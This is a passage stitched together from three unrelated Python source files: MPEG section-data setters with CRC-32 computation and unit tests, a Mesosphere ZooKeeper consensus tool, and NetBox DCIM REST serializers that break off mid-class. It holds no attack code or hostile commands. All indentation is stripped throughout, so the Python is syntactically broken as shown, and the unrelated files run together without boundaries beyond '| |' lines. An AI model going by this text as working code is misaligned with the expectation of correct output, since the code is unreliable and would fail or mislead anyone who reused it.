Given a block of section data, sets the private indicator
Arguments:
data -- List of bytes. Data to manipulate
indicator -- Boolean value to set the indicator to
"""
data[1] = data[1] & int ('10111111', 2)
if indicator: data[1] = data[1] | int ('01000000', 2)
def set_section_length(data, section_length):
"""Sets the section length in the given section data
Given a block of section data, sets the section length
Arguments:
data -- List of bytes. Data to manipulate
section_length -- value to set
"""
#clear the bit feilds first
data[1] = data[1] & int('11110000', 2)
data[2] = 0x00;
#now break up the input
part1 = section_length & 0x0f00
part1 = part1 >> 8
part2 = section_length & 0x00ff
data[1] |= part1
data[2] = part2
# Table body 2
def set_table_id_extension(data, table_id_extension):
"""Sets the table id extension in the given section data
Given a block of section data, sets the table id extension
Arguments:
data -- List of bytes. Data to manipulate
table_id_extension -- value to set
"""
data[3] = (table_id_extension & 0xff00) >> 8
data[4] = table_id_extension & 0x00ff
def set_version_number(data, version):
"""Sets version number in the given section data
Given a block of section data, sets the version number
Arguments:
data -- List of bytes. Data to manipulate
version -- value to set
"""
data[5] &= int('11000001', 2) #clear the bit feilds first
#version &= int('00011111', 2)
version <<= 1
version &= int('00111110', 2)
data[5] |= version
def set_current_next_indicator(data, indicator):
"""Sets the current/next indicator in the given section data
Given a block of section data, sets the current/next indicator
Arguments:
data -- List of bytes. Data to manipulate
indicator -- Boolean value to set the indicator to
"""
data[5] &= int ('11111110', 2)
if indicator: data[5] |= int ('00000001', 2)
def set_section_number(data, section_number):
"""Sets the section number in the given section data
Given a block of section data, sets the section number
Arguments:
data -- List of bytes. Data to manipulate
section_number -- value to set
"""
data[6] = section_number & 0xff
def set_last_section_number(data, last_section_number):
"""Sets the last section number in the given section data
Given a block of section data, sets the last section number
Arguments:
data -- List of bytes. Data to manipulate
last_section_number -- value to set
"""
data[7] = last_section_number & 0xff
def set_data(data, payload, offset):
"""Sets the data payload in the given section data
Given a block of section data, sets the data payload (including CRC)
Arguments:
data -- List of bytes. Data to manipulate
payload -- payload bytes
offset -- the byte at which the data should start
"""
j=0
for i in range(offset, len(data)):
data[i] = payload[j]
j+=1
def calculate_crc(data):
"""Calculate the CRC from a block of section data
Given a block of section data, calculates and returns the CRC
Arguments:
data -- List of bytes. Data to manipulate
Return:
the CRC
"""
polynomial = 0x4c11db7
crc32 = 0xffffffffL
for byte in data:
#byte = ord(byte)
for bit in range(7,-1,-1): # MSB to LSB
z32 = crc32>>31 # top bit
crc32 = crc32 << 1
if ((byte>>bit)&1) ^ z32:
crc32 = crc32 ^ polynomial
crc32 = crc32 & 0xffffffffL
crc_array = []
crc_array.append(int(crc32>>24 & 0x000000ff))
crc_array.append(int(crc32>>16 & 0x000000ff))
crc_array.append(int(crc32>>8 & 0x000000ff))
crc_array.append(int(crc32 & 0x000000ff))
return crc_array
def append_crc(data):
"""Calculate and append the CRC to a block of section data
Given a block of section data, calculates the CRC and then sets it at the end
of the data block (last 4 bytes).
Arguments:
data -- List of bytes. Data to manipulate
"""
crc_array = calculate_crc(data[0:-4])
data[-4:] = crc_array
'''UNIT TESTS -------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':
import unittest
import section_parser as sparser
import random
print("hello world")
SAMPLE_CAT = [
0x01, 0xB0, 0x0F, 0xFF, 0xFF, 0xC1, 0x00, 0x00, 0x09,
0x04, 0x06, 0x06, 0x05, 0x00, 0x90, 0x64, 0xC6, 0xD0]
SAMPLE_CAT_NO_CRC = [
0x01, 0xB0, 0x0F, 0xFF, 0xFF, 0xC1, 0x00, 0x00, 0x09,
0x04, 0x06, 0x06, 0x05, 0x00, 0xFF, 0xFF, 0xFF, 0xFF]
class Crc(unittest.TestCase):
def test_append(self):
append_crc(SAMPLE_CAT_NO_CRC)
self.assertEqual(SAMPLE_CAT_NO_CRC, SAMPLE_CAT)
def test_calculate(self):
self.assertEqual(calculate_crc(SAMPLE_CAT_NO_CRC[0:-4]), SAMPLE_CAT[-4:])
class All(unittest.TestCase):
def test(self):
self.assertEqual(len(self.data), self.data_length)
set_table_id(self.data, 1)
set_section_syntax_indicator(self.data, True)
set_private_indicator(self.data, False)
set_section_length(self.data, self.data_length - 3)
set_table_id_extension(self.data, 20)
set_version_number(self.data, 10)
set_current_next_indicator(self.data, True)
set_section_number(self.data, 25)
set_last_section_number(self.data, 35)
self.data_contents = random.sample(range(256), self.data_length-8)
set_data(self.data, self.data_contents, 8)
actual_data_contents = sparser.get_data(self.data)
self.assertEqual(self.data[0], 1)
self.assertTrue(sparser.get_section_syntax_indicator(self.data))
self.assertFalse(sparser.get_private_indicator(self.data))
self.assertEqual(sparser.get_section_length(self.data), self.data_length-3)
self.assertEqual(sparser.get_table_id_extension(self.data), 20)
self.assertEqual(sparser.get_version_number(self.data), 10)
self.assertTrue(sparser.get_current_next_indicator(self.data))
self.assertEqual(sparser.get_section_number(self.data), 25)
self.assertEqual(sparser.get_last_section_number(self.data), 35)
self.assertEqual(actual_data_contents, self.data_contents)
def setUp(self):
self.data_length = 100
self.data=create_section_data_block(self.data_length)
def tearDown(self):
del(self.data)
class AllReverse(unittest.TestCase):
def test(self):
self.data_contents = random.sample(range(256), self.data_length-8)
set_data(self.data, self.data_contents, 8)
set_last_section_number(self.data, 35)
set_section_number(self.data, 25)
set_current_next_indicator(self.data, True)
set_version_number(self.data, 10)
set_table_id_extension(self.data, 20)
set_section_length(self.data, self.data_length - 3)
set_private_indicator(self.data, False)
set_section_syntax_indicator(self.data, True)
set_table_id(self.data, 1)
self.assertEqual(len(self.data), self.data_length)
self.assertEqual(self.data[0], 1)
self.assertTrue(sparser.get_section_syntax_indicator(self.data))
self.assertFalse(sparser.get_private_indicator(self.data))
self.assertEqual(sparser.get_section_length(self.data), self.data_length-3)
self.assertEqual(sparser.get_table_id_extension(self.data), 20)
self.assertEqual(sparser.get_version_number(self.data), 10)
self.assertTrue(sparser.get_current_next_indicator(self.data))
self.assertEqual(sparser.get_section_number(self.data), 25)
self.assertEqual(sparser.get_last_section_number(self.data), 35)
actual_data_contents = sparser.get_data(self.data)
self.assertEqual(actual_data_contents, self.data_contents)
def setUp(self):
self.data_length = 100
self.data=create_section_data_block(self.data_length)
def tearDown(self):
del(self.data)
class Seq(unittest.TestCase):
def test(self):
self.assertEqual(len(self.data), self.data_length)
set_table_id(self.data, 1)
self.assertEqual(self.data[0], 1, 'error setting table id')
set_section_syntax_indicator(self.data, True)
self.assertTrue(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
set_section_syntax_indicator(self.data, False)
self.assertFalse(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
set_section_syntax_indicator(self.data, True)
self.assertTrue(sparser.get_section_syntax_indicator(self.data), 'Error setting section syntax indicator')
set_private_indicator(self.data, False)
self.assertFalse(sparser.get_private_indicator(self.data), 'Error setting private indicator')
set_section_length(self.data, self.data_length - 3)
self.assertEqual(sparser.get_section_length(self.data), self.data_length-3, 'error setting section length')
set_table_id_extension(self.data, 20)
self.assertEqual(sparser.get_table_id_extension(self.data), 20, 'error setting table id extension')
set_version_number(self.data, 10)
self.assertEqual(sparser.get_version_number(self.data), 10, 'error setting version number')
set_current_next_indicator(self.data, True)
self.assertTrue(sparser.get_current_next_indicator(self.data), 'Error setting current next indicator')
set_section_number(self.data, 25)
self.assertEqual(sparser.get_section_number(self.data), 25, 'error setting section number')
set_last_section_number(self.data, 35)
self.assertEqual(sparser.get_last_section_number(self.data), 35, 'error setting last section number')
self.data_contents = random.sample(range(256), self.data_length-8)
actual_data_contents = sparser.get_data(self.data)
set_data(self.data, self.data_contents, 8)
actual_data_contents = sparser.get_data(self.data)
self.assertEqual(actual_data_contents, self.data_contents, 'error setting section data')
def setUp(self):
self.data_length = 100
self.data=create_section_data_block(self.data_length)
def tearDown(self):
del(self.data)
unittest.main()
| |
# -*- coding: utf-8 -*-
# Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import argparse
import logging
import os
import platform
import sys
import time
import uuid
import kazoo.exceptions
import kazoo.handlers.threading
from kazoo.client import KazooClient
from kazoo.client import KazooState
from retrying import retry
PAYLOAD_SIZE_LIMIT_BYTES = 1024**2
READ_POLL_INTERVAL_SECONDS = 5
DESCRIPTION = """\
Find consensus about a value through ZooKeeper (ZK).
Read proposal byte sequence from stdin.
Write consensus byte sequence to stdout.
"""
logfmt = "%(asctime)s.%(msecs)03d %(name)s %(levelname)s: %(message)s"
datefmt = "%y%m%d-%H:%M:%S"
logging.basicConfig(format=logfmt, datefmt=datefmt, level=logging.INFO)
log = logging.getLogger()
class ConnectionLost(Exception):
pass
def main():
opts = parse_args()
if not opts.zkpath.startswith('/'):
sys.exit('ZK path must start with a slash.')
if opts.zkpath.endswith('/'):
sys.exit('ZK path must not end with a slash.')
if opts.readonly:
log.info('Run in read-only mode.')
r = ZKNodeReader(
hoststring=opts.host,
nodepath=opts.zkpath
)
output = r.read()
else:
log.info('Read payload from stdin.')
# Read binary data directly from standard stream.
payload = sys.stdin.buffer.read()
log.info('Size of payload data: %s bytes.', len(payload))
if len(payload) > PAYLOAD_SIZE_LIMIT_BYTES:
msg = 'Error: payload larger than %s bytes' % (
PAYLOAD_SIZE_LIMIT_BYTES, )
sys.exit(msg)
log.info("Run consensus procedure")
c = ZKValueConsensus(
hoststring=opts.host,
payload=payload,
nodepath=opts.zkpath
)
output = c.achieve_consensus()
log.info('Write %s bytes to stdout.', len(output))
# Write binary data directly to standard stream.
sys.stdout.buffer.write(output)
def retry_read_after_error(exc):
"""Return True if this should be retried."""
log.info("Observed exception: `%r`", exc)
if isinstance(exc, kazoo.exceptions.KazooException):
log.info("Retry as of KazooException.")
return True
if isinstance(exc, kazoo.handlers.threading.KazooTimeoutError):
# https://github.com/python-zk/kazoo/issues/383
log.info("Retry as of kazoo.handlers.threading.KazooTimeoutError.")
return True
log.info("Do not retry.")
return False
class ZKNodeReader:
def __init__(self, hoststring, nodepath):
self._nodepath = nodepath
self._hosts = hoststring
def _readloop(self):
while True:
try:
data, stat = self._zk.get(self._nodepath)
return data, stat
except kazoo.exceptions.NoNodeError:
pass
# TODO(jp): install watch for being fast, and imcrease poll
# interval.
log.info(
"Node `%s` does not yet exist. Retry in %s s.",
self._nodepath, READ_POLL_INTERVAL_SECONDS)
time.sleep(READ_POLL_INTERVAL_SECONDS)
# Wait 2^x * 1000 milliseconds between each retry, up to 64 seconds,
# then 64 seconds afterwards.
@retry(
wait_exponential_multiplier=1000,
wait_exponential_max=64000,
retry_on_exception=retry_read_after_error
)
def read(self):
log.info('Set up ZK client using host(s): %s', self._hosts)
zk = KazooClient(hosts=self._hosts)
zk.start()
self._zk = zk
try:
# This may raise various kazoo.exceptions.* types.
data, stat = self._readloop()
finally:
log.info('Shut down ZK client.')
try:
zk.stop()
finally:
zk.close()
log.info('Foreign payload stat: %s', stat)
return data
def retry_consensus_after_error(exc):
"""Return True if this should be retried."""
log.info("Observed exception: `%r`", exc)
if isinstance(exc, kazoo.exceptions.KazooException):
log.info("Retry as of KazooException.")
return True
if isinstance(exc, ConnectionLost):
log.info("Retry as of ConnectionLost.")
return True
if isinstance(exc, kazoo.handlers.threading.KazooTimeoutError):
# https://github.com/python-zk/kazoo/issues/383
log.info("Retry as of kazoo.handlers.threading.KazooTimeoutError.")
return True
return False
class ZKValueConsensus:
"""A helper class for achieving consensus across multiple parties, using
the ZK distributed lock recipe as coordination mechanism.
Every contributing party uses the same `nodepath`, proposes its own value
(`payload`), and eventually all parties proceed using the same value,
which is one of the proposed ones.
"""
def __init__(self, hoststring, payload, nodepath):
self._nodepath = nodepath
self._payload = payload
self._hosts = hoststring
# Use current hostname as ZK lock contender identifier, plus some
# random bytes.
self._identifier = platform.node() + '-' + str(uuid.uuid4())[:8]
# Wait 2^x * 1000 milliseconds between each retry, up to 64 seconds,
# then 64 seconds afterwards.
@retry(
wait_exponential_multiplier=1000,
wait_exponential_max=64000,
retry_on_exception=retry_consensus_after_error
)
def achieve_consensus(self):
"""Trigger consensus logic and handle errors."""
log.info('Set up ZK client using host(s): %s', self._hosts)
zk = KazooClient(hosts=self._hosts)
# Initialize ZK connection state variable, which is shared across
# threads. It is updated from a change listener function which is
# invoked from within a Kazoo connection management thread, see
# http://kazoo.readthedocs.org/en/latest/api/handlers/threading.html.
self._connected = False
zk.add_listener(self._zk_state_change_listener)
zk.start()
# Wait for handling thread to update connection status. (As of non-
# determinism around GIL context switches there is otherwise no
# guarantee that the status is updated within
# `_run_consensus_procedure`).
while not self._connected:
time.sleep(0.01)
self._zk = zk
try:
# This may raise ConnectionLost or various
# kazoo.exceptions.* types.
return self._run_consensus_procedure()
finally:
log.info('Shut down ZK client.')
try:
zk.stop()
finally:
zk.close()
def _run_consensus_procedure(self):
"""
Normal operation:
- Acquire distributed lock.
- Attempt to create node.
- If creation fails because node is already existing, then read
data and return it. If creation succeeds, return corresponding
value.
- Before returning, release the lock.
Handling of unexpected events:
- If the distributed lock acquisition times out, repeat,
endlessly, in a loop.
- If the ZK connection state degrades, raise `ConnectionLost`,
to be handled on a higher level.
- No other magic is performed, so any kazoo exception thrown
needs to handled on a higher level.
"""
head, tail = os.path.split(self._nodepath)
lockpath = os.path.join(head, 'lock')
lock = self._zk.Lock(path=lockpath, identifier=self._identifier)
while True:
if not self._connected:
raise ConnectionLost
timed_out = False
try:
log.info("Attempt to acquire distributed lock.")
lock.acquire(timeout=7)
log.info("Distributed lock acquired.")
return self._set_or_read()
except kazoo.exceptions.LockTimeout:
log.info("Distributed lock acquisition timed out. Retry.")
timed_out = True
finally:
if not timed_out:
# Release lock, clean up.
log.info("Release distributed lock.")
lock.release()
else:
# No cleanup required as lock acquisition timed out.
pass
def _set_or_read(self):
# Execute under distributed lock protection.
log.info('Attempt to create node `%s`.', self._nodepath)
try:
self._zk.create(
path=self._nodepath, value=self._payload, makepath=True)
log.info('Node creation succeeded, return "my" payload.')
return self._payload
except kazoo.exceptions.NodeExistsError:
log.info('Node exists. Read it.')
data, stat = self._zk.get(self._nodepath)
log.info('Foreign payload stat: %s', stat)
return data
def _zk_state_change_listener(self, state):
"""
'When using the kazoo.recipe.lock.Lock or creating ephemeral nodes,
its highly recommended to add a state listener so that your program
can properly deal with connection interruptions or a Zookeeper session
loss.'
This is executed in the
kazoo.handlers.threading.SequentialThreadingHandler
"""
if state == KazooState.LOST:
log.info('Connection state is KazooState.LOST')
self._connected = False
elif state == KazooState.SUSPENDED:
log.info('Connection state is KazooState.SUSPENDED')
self._connected = False
else:
# CONNECTED state.
log.info('Connection state is KazooState.CONNECTED')
self._connected = True
def parse_args():
parser = argparse.ArgumentParser(
description=DESCRIPTION)
parser.add_argument(
'zkpath',
type=str,
help='The ZK node path to sync on.'
)
parser.add_argument(
'--host',
type=str,
default='127.0.0.1:2181',
help=('Host string passed to Kazoo client constructor. '
'Default: 127.0.0.1:2181'))
parser.add_argument(
'--read',
dest='readonly',
action='store_true',
default=False,
help=('Only read (do not contribute to consensus). Wait until node '
'exists, and return data to stdout.'))
return parser.parse_args()
| |
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from drf_yasg.utils import swagger_serializer_method
from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from timezone_field.rest_framework import TimeZoneSerializerField
from dcim.choices import *
from dcim.constants import *
from dcim.models import (
Cable, CablePath, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate, Device, DeviceBay,
DeviceBayTemplate, DeviceType, DeviceRole, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate,
Manufacturer, InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort,
PowerPortTemplate, Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site,
VirtualChassis,
)
from extras.api.customfields import CustomFieldModelSerializer
from extras.api.serializers import TaggedObjectSerializer
from ipam.api.nested_serializers import NestedIPAddressSerializer, NestedVLANSerializer
from ipam.models import VLAN
from netbox.api import (
ChoiceField, ContentTypeField, SerializedPKRelatedField, ValidatedModelSerializer,
WritableNestedSerializer,
)
from tenancy.api.nested_serializers import NestedTenantSerializer
from users.api.nested_serializers import NestedUserSerializer
from utilities.api import get_serializer_for_model
from virtualization.api.nested_serializers import NestedClusterSerializer
from .nested_serializers import *
class CableTerminationSerializer(serializers.ModelSerializer):
cable_peer_type = serializers.SerializerMethodField(read_only=True)
cable_peer = serializers.SerializerMethodField(read_only=True)
def get_cable_peer_type(self, obj):
if obj._cable_peer is not None:
return f'{obj._cable_peer._meta.app_label}.{obj._cable_peer._meta.model_name}'
return None
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_cable_peer(self, obj):
"""
Return the appropriate serializer for the cable termination model.
"""
if obj._cable_peer is not None:
serializer = get_serializer_for_model(obj._cable_peer, prefix='Nested')
context = {'request': self.context['request']}
return serializer(obj._cable_peer, context=context).data
return None
class ConnectedEndpointSerializer(ValidatedModelSerializer):
connected_endpoint_type = serializers.SerializerMethodField(read_only=True)
connected_endpoint = serializers.SerializerMethodField(read_only=True)
connected_endpoint_reachable = serializers.SerializerMethodField(read_only=True)
def get_connected_endpoint_type(self, obj):
if obj._path is not None and obj._path.destination is not None:
return f'{obj._path.destination._meta.app_label}.{obj._path.destination._meta.model_name}'
return None
@swagger_serializer_method(serializer_or_field=serializers.DictField)
def get_connected_endpoint(self, obj):
"""
Return the appropriate serializer for the type of connected object.
"""
if obj._path is not None and obj._path.destination is not None:
serializer = get_serializer_for_model(obj._path.destination, prefix='Nested')
context = {'request': self.context['request']}
return serializer(obj._path.destination, context=context).data
return None
@swagger_serializer_method(serializer_or_field=serializers.BooleanField)
def get_connected_endpoint_reachable(self, obj):
if obj._path is not None:
return obj._path.is_active
return None
#
# Regions/sites
#
class RegionSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:region-detail')
parent = NestedRegionSerializer(required=False, allow_null=True)
site_count = serializers.IntegerField(read_only=True)
_depth = serializers.IntegerField(source='level', read_only=True)
class Meta:
model = Region
fields = ['id', 'url', 'name', 'slug', 'parent', 'description', 'site_count', '_depth']
class SiteSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:site-detail')
status = ChoiceField(choices=SiteStatusChoices, required=False)
region = NestedRegionSerializer(required=False, allow_null=True)
tenant = NestedTenantSerializer(required=False, allow_null=True)
time_zone = TimeZoneSerializerField(required=False)
circuit_count = serializers.IntegerField(read_only=True)
device_count = serializers.IntegerField(read_only=True)
prefix_count = serializers.IntegerField(read_only=True)
rack_count = serializers.IntegerField(read_only=True)
virtualmachine_count = serializers.IntegerField(read_only=True)
vlan_count = serializers.IntegerField(read_only=True)
class Meta:
model = Site
fields = [
'id', 'url', 'name', 'slug', 'status', 'region', 'tenant', 'facility', 'asn', 'time_zone', 'description',
'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
'contact_email', 'comments', 'tags', 'custom_fields', 'created', 'last_updated', 'circuit_count',
'device_count', 'prefix_count', 'rack_count', 'virtualmachine_count', 'vlan_count',
]
#
# Racks
#
class RackGroupSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackgroup-detail')
site = NestedSiteSerializer()
parent = NestedRackGroupSerializer(required=False, allow_null=True)
rack_count = serializers.IntegerField(read_only=True)
_depth = serializers.IntegerField(source='level', read_only=True)
class Meta:
model = RackGroup
fields = ['id', 'url', 'name', 'slug', 'site', 'parent', 'description', 'rack_count', '_depth']
class RackRoleSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackrole-detail')
rack_count = serializers.IntegerField(read_only=True)
class Meta:
model = RackRole
fields = ['id', 'url', 'name', 'slug', 'color', 'description', 'rack_count']
class RackSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rack-detail')
site = NestedSiteSerializer()
group = NestedRackGroupSerializer(required=False, allow_null=True, default=None)
tenant = NestedTenantSerializer(required=False, allow_null=True)
status = ChoiceField(choices=RackStatusChoices, required=False)
role = NestedRackRoleSerializer(required=False, allow_null=True)
type = ChoiceField(choices=RackTypeChoices, allow_blank=True, required=False)
width = ChoiceField(choices=RackWidthChoices, required=False)
outer_unit = ChoiceField(choices=RackDimensionUnitChoices, allow_blank=True, required=False)
device_count = serializers.IntegerField(read_only=True)
powerfeed_count = serializers.IntegerField(read_only=True)
class Meta:
model = Rack
fields = [
'id', 'url', 'name', 'facility_id', 'display_name', 'site', 'group', 'tenant', 'status', 'role', 'serial',
'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
'comments', 'tags', 'custom_fields', 'created', 'last_updated', 'device_count', 'powerfeed_count',
]
# Omit the UniqueTogetherValidator that would be automatically added to validate (group, facility_id). This
# prevents facility_id from being interpreted as a required field.
validators = [
UniqueTogetherValidator(queryset=Rack.objects.all(), fields=('group', 'name'))
]
def validate(self, data):
# Validate uniqueness of (group, facility_id) since we omitted the automatically-created validator from Meta.
if data.get('facility_id', None):
validator = UniqueTogetherValidator(queryset=Rack.objects.all(), fields=('group', 'facility_id'))
validator(data, self)
# Enforce model validation
super().validate(data)
return data
class RackUnitSerializer(serializers.Serializer):
"""
A rack unit is an abstraction formed by the set (rack, position, face); it does not exist as a row in the database.
"""
id = serializers.IntegerField(read_only=True)
name = serializers.CharField(read_only=True)
face = ChoiceField(choices=DeviceFaceChoices, read_only=True)
device = NestedDeviceSerializer(read_only=True)
occupied = serializers.BooleanField(read_only=True)
class RackReservationSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rackreservation-detail')
rack = NestedRackSerializer()
user = NestedUserSerializer()
tenant = NestedTenantSerializer(required=False, allow_null=True)
class Meta:
model = RackReservation
fields = ['id', 'url', 'rack', 'units', 'created', 'user', 'tenant', 'description', 'tags', 'custom_fields']
class RackElevationDetailFilterSerializer(serializers.Serializer):
q = serializers.CharField(
required=False,
default=None
)
face = serializers.ChoiceField(
choices=DeviceFaceChoices,
default=DeviceFaceChoices.FACE_FRONT
)
render = serializers.ChoiceField(
choices=RackElevationDetailRenderChoices,
default=RackElevationDetailRenderChoices.RENDER_JSON
)
unit_width = serializers.IntegerField(
default=settings.RACK_ELEVATION_DEFAULT_UNIT_WIDTH
)
unit_height = serializers.IntegerField(
default=settings.RACK_ELEVATION_DEFAULT_UNIT_HEIGHT
)
legend_width = serializers.IntegerField(
default=RACK_ELEVATION_LEGEND_WIDTH_DEFAULT
)
exclude = serializers.IntegerField(
required=False,
default=None
)
expand_devices = serializers.BooleanField(
required=False,
default=True
)
include_images = serializers.BooleanField(
required=False,
default=True
)
#
# Device types
#
class ManufacturerSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:manufacturer-detail')
devicetype_count = serializers.IntegerField(read_only=True)
inventoryitem_count = serializers.IntegerField(read_only=True)
platform_count = serializers.IntegerField(read_only=True)
class Meta:
model = Manufacturer
fields = [
'id', 'url', 'name', 'slug', 'description', 'devicetype_count', 'inventoryitem_count', 'platform_count',
]
class DeviceTypeSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicetype-detail')
manufacturer = NestedManufacturerSerializer()
subdevice_role = ChoiceField(choices=SubdeviceRoleChoices, allow_blank=True, required=False)
device_count = serializers.IntegerField(read_only=True)
class Meta:
model = DeviceType
fields = [
'id', 'url', 'manufacturer', 'model', 'slug', 'display_name', 'part_number', 'u_height', 'is_full_depth',
'subdevice_role', 'front_image', 'rear_image', 'comments', 'tags', 'custom_fields', 'created',
'last_updated', 'device_count',
]
class ConsolePortTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleporttemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(
choices=ConsolePortTypeChoices,
allow_blank=True,
required=False
)
class Meta:
model = ConsolePortTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'description']
class ConsoleServerPortTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleserverporttemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(
choices=ConsolePortTypeChoices,
allow_blank=True,
required=False
)
class Meta:
model = ConsoleServerPortTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'description']
class PowerPortTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerporttemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(
choices=PowerPortTypeChoices,
allow_blank=True,
required=False
)
class Meta:
model = PowerPortTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description']
class PowerOutletTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:poweroutlettemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(
choices=PowerOutletTypeChoices,
allow_blank=True,
required=False
)
power_port = NestedPowerPortTemplateSerializer(
required=False
)
feed_leg = ChoiceField(
choices=PowerOutletFeedLegChoices,
allow_blank=True,
required=False
)
class Meta:
model = PowerOutletTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description']
class InterfaceTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:interfacetemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(choices=InterfaceTypeChoices)
class Meta:
model = InterfaceTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'mgmt_only', 'description']
class RearPortTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearporttemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(choices=PortTypeChoices)
class Meta:
model = RearPortTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'positions', 'description']
class FrontPortTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:frontporttemplate-detail')
device_type = NestedDeviceTypeSerializer()
type = ChoiceField(choices=PortTypeChoices)
rear_port = NestedRearPortTemplateSerializer()
class Meta:
model = FrontPortTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description']
class DeviceBayTemplateSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicebaytemplate-detail')
device_type = NestedDeviceTypeSerializer()
class Meta:
model = DeviceBayTemplate
fields = ['id', 'url', 'device_type', 'name', 'label', 'description']
#
# Devices
#
class DeviceRoleSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicerole-detail')
device_count = serializers.IntegerField(read_only=True)
virtualmachine_count = serializers.IntegerField(read_only=True)
class Meta:
model = DeviceRole
fields = [
'id', 'url', 'name', 'slug', 'color', 'vm_role', 'description', 'device_count', 'virtualmachine_count',
]
class PlatformSerializer(ValidatedModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:platform-detail')
manufacturer = NestedManufacturerSerializer(required=False, allow_null=True)
device_count = serializers.IntegerField(read_only=True)
virtualmachine_count = serializers.IntegerField(read_only=True)
class Meta:
model = Platform
fields = [
'id', 'url', 'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description', 'device_count',
'virtualmachine_count',
]
class DeviceSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name='dcim-api:device-detail')
device_type = NestedDeviceTypeSerializer()
device_role = NestedDeviceRoleSerializer()
tenant = NestedTenantSerializer(required=False, allow_null=True)
platform = NestedPlatformSerializer(required=False, allow_null=True)
site = NestedSiteSerializer()
rack = NestedRackSerializer(required=False, allow_null=True)
face = ChoiceField(choices=DeviceFaceChoices, allow_blank=True, required=False)
status = ChoiceField(choices=DeviceStatusChoices, required=False)
primary_ip = NestedIPAddressSerializer(read_only=True)
primary_ip4 = NestedIPAddressSerializer(required=False, allow_null=True)
primary_ip6 = NestedIPAddressSerializer(required=False, allow_null=True)
parent_device = serializers.SerializerMethodField()
cluster = NestedClusterSerializer(required=False, allow_null=True)
virtual_chassis = NestedVirtualChassisSerializer(required=False, allow_null=True)
class Meta:
model = Device
fields = [
'id', 'url', 'name', 'display_name', 'device_type', 'device_role', 'tenant', 'platform', 'serial',
'asset_tag', 'site', 'rack', 'position', 'face', 'parent_device', 'status', 'primary_ip', 'primary_ip4',
'primary_ip6', 'cluster', 'virtual_chassis', 'vc_position', 'vc_priority', 'comments', 'local_context_data',
'tags', 'custom_fields', 'created', 'last_updated',
]
validators = []
def validate(self, data):
# Validate uniqueness of (rack, position, face) since we omitted the automatically-created validator from Meta.
if data.get('rack') and data.get('position') and data.get('face'):
validator = UniqueTogetherValidator(queryset=Device.objects.all(), fields=('rack', 'position', 'face'))
validator(data, self)
# Enforce model validation
super().validate(data)
return data
@swagger_serializer_method(serializer_or_field=NestedDeviceSerializer)
def get_parent_device(self, obj):
try:
device_bay = obj.parent_bay
except DeviceBay.DoesNotExist:
return None
context = {'request': self.context['request']}
data = NestedDeviceSerializer(instance=device_bay.device, context=context).data
data['device_bay'] = NestedDeviceBaySerializer(instance=device_bay, context=context).data
return data
class DeviceWithConfigContextSerializer(DeviceSerializer):
config_context = serializers.SerializerMethodField()
class Meta(DeviceSerializer.Meta):
fields = [
